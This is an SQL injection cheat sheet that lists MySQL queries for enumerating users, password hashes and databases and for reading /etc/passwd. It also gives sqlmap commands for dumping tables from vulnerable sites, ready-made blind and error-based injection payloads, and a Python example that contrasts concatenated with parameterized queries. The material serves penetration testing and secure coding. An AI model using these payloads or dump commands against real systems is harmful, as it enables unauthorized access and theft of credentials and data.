SQL Injection Cheat Sheet

  • Last Updated : 02 Aug, 2022

SQL injection is a common vulnerability in web applications that can be exploited to inject malicious SQL code into a database. An attacker who knows the correct syntax for injecting SQL commands into an application's back end could use this to execute unauthorized or destructive actions on behalf of the target user. An ethical hacker should always test for and identify potential SQL injection vulnerabilities, as SQL injection is one of the most frequently used attacks in today's digital world.

The purpose of this cheat sheet is to provide you with quick, accurate, ready-to-use commands and the necessary sqlmap queries to help you with SQL injections.

Basics of SQL: 

| S. No. | Parameters | SQL Queries/Examples |
|---|---|---|
| 1. | Version | `SELECT @@version;` |
| 2. | Comments | `/* */` or `#` |
| 3. | Current user | `SELECT user();` or `SELECT system_user()` |
| 4. | List users | `SELECT user FROM mysql.user;` |
| 5. | List password hashes | `SELECT host, user, password FROM mysql.user;` |
| 6. | Current Database | `SELECT database()` |
| 7. | List databases | `SELECT schema_name FROM information_schema.schemata;` or `SELECT distinct(db) FROM mysql.db` |
| 8. | List tables | `SELECT table_schema,table_name FROM information_schema.tables WHERE table_schema != 'mysql' AND table_schema != 'information_schema'` |
| 9. | List columns | `SELECT table_schema, table_name, column_name FROM information_schema.columns WHERE table_schema != 'mysql' AND table_schema != 'information_schema'` |
| 10. | Find Tables From Column Name | `SELECT table_schema, table_name FROM information_schema.columns WHERE column_name = 'username';` |
| 11. | Time delay | `SELECT BENCHMARK(1000000,MD5('A'));` `SELECT SLEEP(5); # >= 5.0.12` |
| 12. | Local File Access | `UNION ALL SELECT LOAD_FILE('/etc/passwd')` |
| 13. | Hostname/IP Address | `SELECT @@hostname;` |
| 14. | Create user | `CREATE USER test1 IDENTIFIED BY 'pass1';` |
| 15. | Delete user Location of the db file | `SELECT @@datadir;` |

Basic Commands of SQLMap:

| S. No. | Parameters | SQLMap Queries Syntax |
|---|---|---|
| 1. | To attack a database of a vulnerable website | `sqlmap -u "Vulnerable URL" --dbs` |
| 2. | To get tables from a database of a vulnerable website | `sqlmap -u "Vulnerable URL" --tables -D [Name of database]` |
| 3. | To get columns of a table on the vulnerable website | `sqlmap -u "Vulnerable URL" --columns -D [Name of database] -T [table name]` |
| 4. | To dump all values of the table of a vulnerable website | `sqlmap -u "Vulnerable URL" --dump -D [Name of database] -T [table name]` |

Manual Attacks on SQLMap:

| S. No. | Manual Attack Parameters | SQLMap Queries/Examples |
|---|---|---|
| 1. | Quick detect INTEGERS | `select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))` |
| 2. | Quick detect STRINGS | `'+(select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'` |
| 3. | Clear SQL Test | `product.php?id=4`<br>`product.php?id=5-1`<br>`product.php?id=4 OR 1=1`<br>`product.php?id=-1 OR 17-7=10` |
| 4. | Blind SQL Injection | `SLEEP(25)--`<br>`SELECT BENCHMARK(1000000,MD5('A'));` |
| 5. | Real world sample | `ProductID=1 OR SLEEP(25)=0 LIMIT 1--`<br>`ProductID=1) OR SLEEP(25)=0 LIMIT 1--`<br>`ProductID=1' OR SLEEP(25)=0 LIMIT 1--`<br>`ProductID=1') OR SLEEP(25)=0 LIMIT 1--`<br>`ProductID=1)) OR SLEEP(25)=0 LIMIT 1--`<br>`ProductID=SELECT SLEEP(25)--` |
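
Why the four "Clear SQL Test" values tell a tester (or a regression test) whether a parameter is being parsed as SQL, and how type checking plus parameter binding removes that behaviour. This is an added example, not code from the original article; it assumes an in-memory SQLite database standing in for the MySQL back end, and the `products` table and all function names are hypothetical.

```python
import sqlite3

PROBES = ["4", "5-1", "4 OR 1=1", "-1 OR 17-7=10"]  # values after "id=" in the row

def make_db():
    # Constructed sample data; the products table is a hypothetical schema.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT)")
    db.executemany("INSERT INTO products VALUES (?, ?)",
                   [(4, "lamp"), (5, "desk"), (6, "chair")])
    return db

def lookup_concatenated(db, raw_id):
    # Vulnerable pattern: the parameter becomes part of the SQL text,
    # so the database parses "5-1" or "OR 1=1" as expressions.
    sql = "SELECT id FROM products WHERE id = " + raw_id
    return sorted(row[0] for row in db.execute(sql))

def lookup_parameterized(db, raw_id):
    # Hardened pattern: enforce the expected type, then bind the value.
    try:
        value = int(raw_id)
    except ValueError:
        return None  # rejected before any SQL runs
    rows = db.execute("SELECT id FROM products WHERE id = ?", (value,))
    return sorted(row[0] for row in rows)

def run_probes(lookup):
    db = make_db()
    return {probe: lookup(db, probe) for probe in PROBES}

def evaluates_input_as_sql(lookup):
    # Regression check for a test suite: arithmetic in the parameter must not
    # select the same row as the plain id, and a tautology must not widen it.
    r = run_probes(lookup)
    widened = any(len(r[p] or []) > len(r["4"]) for p in PROBES[2:])
    return r["5-1"] == r["4"] or widened

if __name__ == "__main__":
    for fn in (lookup_concatenated, lookup_parameterized):
        print(fn.__name__, "evaluates input as SQL:", evaluates_input_as_sql(fn))
        for probe, rows in run_probes(fn).items():
            print(f"  id={probe!r:<18} -> {rows}")
```

With the concatenated query, `5-1` returns the same row as `4` and both `OR` probes return every row; with the bound query, only the plain integer is accepted.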

You can also learn more about SQL Injections from the article: How to use SQLMAP to test a website for SQL Injection vulnerability.

